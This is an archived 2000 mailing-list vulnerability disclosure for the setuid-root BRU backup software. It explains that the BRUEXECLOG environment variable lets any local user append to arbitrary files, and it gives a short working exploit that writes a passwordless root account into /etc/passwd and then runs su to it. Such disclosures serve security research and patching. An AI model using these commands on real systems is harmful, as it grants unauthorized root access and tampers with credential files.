|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: BRU Vulnerability
From: root (comsec.admin
GTE.NET)Date: Tue Jun 06 2000 - 16:22:24 CDT
- Next message: Forrest J. Cavalier III: "Re: innd 2.2.2 remote buffer overflow"
- Previous message: Russ Allbery: "Re: innd 2.2.2 remote buffer overflow"
- Next in thread: Gavrie Philipson: "Re: BRU Vulnerability"
- Reply: Gavrie Philipson: "Re: BRU Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
We have found a vulnerability in BRU during our 'Security Contest' for
our company.
The details are included.
--Riley Hassell Network Security Speakeasy Networks
1-206-728-9770 ext151
1-206-917-5151 Direct Line
BRU backup software Vulnerability:
Description: You can change the log file BRU uses by changing the BRUEXECLOG environment variable. Since bru is setuid root you can append to any file on the system.
Exploitation:
$ BRUEXECLOG=/etc/passwd $ export BRUEXECLOG $ bru -V ' > comsec::0:0::/:/bin/sh > ' $ su comsec #
Temporary fix: Why do normal users need to run bru. ;)
- Next message: Forrest J. Cavalier III: "Re: innd 2.2.2 remote buffer overflow"
- Previous message: Russ Allbery: "Re: innd 2.2.2 remote buffer overflow"
- Next in thread: Gavrie Philipson: "Re: BRU Vulnerability"
- Reply: Gavrie Philipson: "Re: BRU Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]